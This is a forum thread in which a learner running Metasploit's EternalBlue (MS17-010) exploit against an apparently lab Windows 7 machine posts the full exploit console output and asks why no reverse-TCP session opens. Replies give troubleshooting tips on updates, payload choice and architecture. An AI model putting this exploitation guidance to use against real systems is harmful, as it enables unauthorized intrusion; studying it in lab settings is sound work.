Why dont work eternalblue exploit into metasploit?
#1
Foreword: Forgive me if there is something incomprehensible in this text. I don't speak English well

So. I decided to study metasploit. I decided to try the tutorial. One of the first exploits to be found on the page is eternalblue and meterpreter reverse tcp. Having pretty much worn out with a virtual machine and setting up network interfaces, I check the machine for this vulnerability with a scanner. And it worked! The machine is vulnerable!!!!
Code:
[+] 192.168.1.228:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*]192.168.1.228:445    - Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed


I thought that there was not much left and I would get access, but then a bummer was waiting for me (((

When launching the exploit, it writes errors:
Code:
[*]Started reverse TCP handler on 192.168.1.215:4444
[*]192.168.1.228:445 - Executing automatic check (disable AutoCheck to override)
[*]192.168.1.228:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.228:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*]192.168.1.228:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.228:445 - The target is vulnerable.
[*]192.168.1.228:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.228:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*]192.168.1.228:445    - Scanned 1 of 1 hosts (100% complete)
[*]192.168.1.228:445 - Connecting to target for exploitation.
[+] 192.168.1.228:445 - Connection established for exploitation.
[+] 192.168.1.228:445 - Target OS selected valid for OS indicated by SMB reply
[*]192.168.1.228:445 - CORE raw buffer dump (42 bytes)
[*]192.168.1.228:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*]192.168.1.228:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*]192.168.1.228:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.1.228:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*]192.168.1.228:445 - Trying exploit with 12 Groom Allocations.
[*]192.168.1.228:445 - Sending all but last fragment of exploit packet
[*]192.168.1.228:445 - Starting non-paged pool grooming
[+] 192.168.1.228:445 - Sending SMBv2 buffers
[+] 192.168.1.228:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*]192.168.1.228:445 - Sending final SMBv2 buffers.
[*]192.168.1.228:445 - Sending last fragment of exploit packet!
[*]192.168.1.228:445 - Receiving response from exploit packet
[+] 192.168.1.228:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*]192.168.1.228:445 - Sending egg to corrupted connection.
[*]192.168.1.228:445 - Triggering free of corrupted buffer.
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*]192.168.1.228:445 - Connecting to target for exploitation.
[+] 192.168.1.228:445 - Connection established for exploitation.
[+] 192.168.1.228:445 - Target OS selected valid for OS indicated by SMB reply
[*]192.168.1.228:445 - CORE raw buffer dump (42 bytes)
[*]192.168.1.228:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*]192.168.1.228:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*]192.168.1.228:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.1.228:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*]192.168.1.228:445 - Trying exploit with 17 Groom Allocations.
[*]192.168.1.228:445 - Sending all but last fragment of exploit packet
[*]192.168.1.228:445 - Starting non-paged pool grooming
[+] 192.168.1.228:445 - Sending SMBv2 buffers
[+] 192.168.1.228:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*]192.168.1.228:445 - Sending final SMBv2 buffers.
[*]192.168.1.228:445 - Sending last fragment of exploit packet!
[*]192.168.1.228:445 - Receiving response from exploit packet
[+] 192.168.1.228:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*]192.168.1.228:445 - Sending egg to corrupted connection.
[*]192.168.1.228:445 - Triggering free of corrupted buffer.
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*]192.168.1.228:445 - Connecting to target for exploitation.
[+] 192.168.1.228:445 - Connection established for exploitation.
[+] 192.168.1.228:445 - Target OS selected valid for OS indicated by SMB reply
[*]192.168.1.228:445 - CORE raw buffer dump (42 bytes)
[*]192.168.1.228:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*]192.168.1.228:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*]192.168.1.228:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.1.228:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*]192.168.1.228:445 - Trying exploit with 22 Groom Allocations.
[*]192.168.1.228:445 - Sending all but last fragment of exploit packet
[*]192.168.1.228:445 - Starting non-paged pool grooming
[+] 192.168.1.228:445 - Sending SMBv2 buffers
[+] 192.168.1.228:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*]192.168.1.228:445 - Sending final SMBv2 buffers.
[*]192.168.1.228:445 - Sending last fragment of exploit packet!
[*]192.168.1.228:445 - Receiving response from exploit packet
[+] 192.168.1.228:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*]192.168.1.228:445 - Sending egg to corrupted connection.
[*]192.168.1.228:445 - Triggering free of corrupted buffer.
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.228:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*]Exploit completed, but no session was created.



And what to do with it? Why does not it work? How to solve?
Reply
#2
Could be a lot of things, but I'll give you the benefit of the doubt and not ask too many stupid questions; the tutorial covered RHOSTs/LHOSTs so I'm assuming you followed all steps.

If you are on Ubuntu/Debian, there is a chance the package in the official repositories (if there is one) doesn't come installed with a bunch of Ruby Gems that are actually required. Install from source and make sure all the dependencies are there.

If you are not using latest Kali (2021.1), msf might be outdated: run apt update and upgrade.

Make sure the device you're pentesting is the same architecture as your payload (the tutorial uses x64.)

Use a different payload if all else fails. There are lots of reverse_tcp payloads (meterpreter, staged, etc.)
Reply
#3
Sometimes, all you have to do is relaunch the exact same attack, and it will work.
Sometimes, you'll have to change your payload, staged to stageless, etc.
Sometimes, the machine you are targeting actually isn't exploitable, and you'll to find another way in.
Reply
#4
(03-11-2021, 05:25 PM)poppopret Wrote: Could be a lot of things, but I'll give you the benefit of the doubt and not ask too many stupid questions; the tutorial covered RHOSTs/LHOSTs so I'm assuming you followed all steps.

If you are on Ubuntu/Debian, there is a chance the package in the official repositories (if there is one) doesn't come installed with a bunch of Ruby Gems that are actually required. Install from source and make sure all the dependencies are there.

If you are not using latest Kali (2021.1), msf might be outdated: run apt update and upgrade.

Make sure the device you're pentesting is the same architecture as your payload (the tutorial uses x64.)

Use a different payload if all else fails. There are lots of reverse_tcp payloads (meterpreter, staged, etc.)

The version is the latest. I tried to change the load by another 3-4 others, but the problem does not disappear. Also, sometimes the OS itself is sometimes rebooted, tk. some error occurs with lsass

(03-12-2021, 12:16 AM)Wipe_TS Wrote: Sometimes, all you have to do is relaunch the exact same attack, and it will work.
Sometimes, you'll have to change your payload, staged to stageless, etc.
Sometimes, the machine you are targeting actually isn't exploitable, and you'll to find another way in.

Ok, I'll know

MY GOD! I'm very dumb! Forgot to open ports XD This is my constant headache XD

thanks for the help Wink
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  why won't it let me copy tftp into flash from CISCO router to server? QMark 1 11,805 06-01-2020, 07:54 PM
Last Post: Insider
  why can't I capture home traffic? QMark 6 21,255 07-01-2018, 09:06 PM
Last Post: QMark
  What are some of the most efficient ways to learn how to hack into residential WiFi's Lucy77x77 2 13,864 05-08-2018, 01:28 AM
Last Post: Lucy77x77